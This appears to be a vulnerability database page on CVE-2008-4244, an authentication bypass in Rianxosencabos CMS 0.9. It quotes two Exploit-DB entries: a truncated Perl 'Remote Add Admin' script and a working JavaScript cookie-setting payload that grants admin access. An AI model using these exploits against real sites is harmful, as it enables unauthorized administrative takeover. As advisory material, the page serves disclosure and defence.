CVE-2008-4244
published 2008-09-25CVE-2008-4244: Rianxosencabos CMS 0.9 allows remote attackers to bypass authentication and gain administrative access by setting the usuario and pass cookies to 1.
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.86%
85.0th percentile
Rianxosencabos CMS 0.9 allows remote attackers to bypass authentication and gain administrative access by setting the usuario and pass cookies to 1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rianxosencabos_cms | rianxosencabos_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Rianxosencabos CMS 0.9 - Remote Add Admin
exploitdb·2008-09-24
CVE-2008-4244 Rianxosencabos CMS 0.9 - Remote Add Admin
Rianxosencabos CMS 0.9 - Remote Add Admin
---
#!/usr/bin/perl -w
# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
# written by ka0x
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
use LWP::UserAgent;
my ($host, $login, $pass, $mail, $user_id) = @ARGV ;
unless($ARGV[4]){
print "[*] usage: perl $0 \n";
print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
exit 1;
}
if ($host !~ /^http:/){ $host = 'http://'.$host; }
my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ;
sub __CREATE {
my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
$req->conten
Exploit-DB
Rianxosencabos CMS 0.9 - Insecure Cookie Handling
exploitdb·2008-09-21
CVE-2008-4244 Rianxosencabos CMS 0.9 - Insecure Cookie Handling
Rianxosencabos CMS 0.9 - Insecure Cookie Handling
---
###############################################################################################
[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
################################################################################################
---
exploit:
javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
# milw0rm.com [2008-09-21]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4312http://www.securityfocus.com/bid/31292https://exchange.xforce.ibmcloud.com/vulnerabilities/45291https://www.exploit-db.com/exploits/6521http://securityreason.com/securityalert/4312http://www.securityfocus.com/bid/31292https://exchange.xforce.ibmcloud.com/vulnerabilities/45291https://www.exploit-db.com/exploits/6521
2008-09-25
Published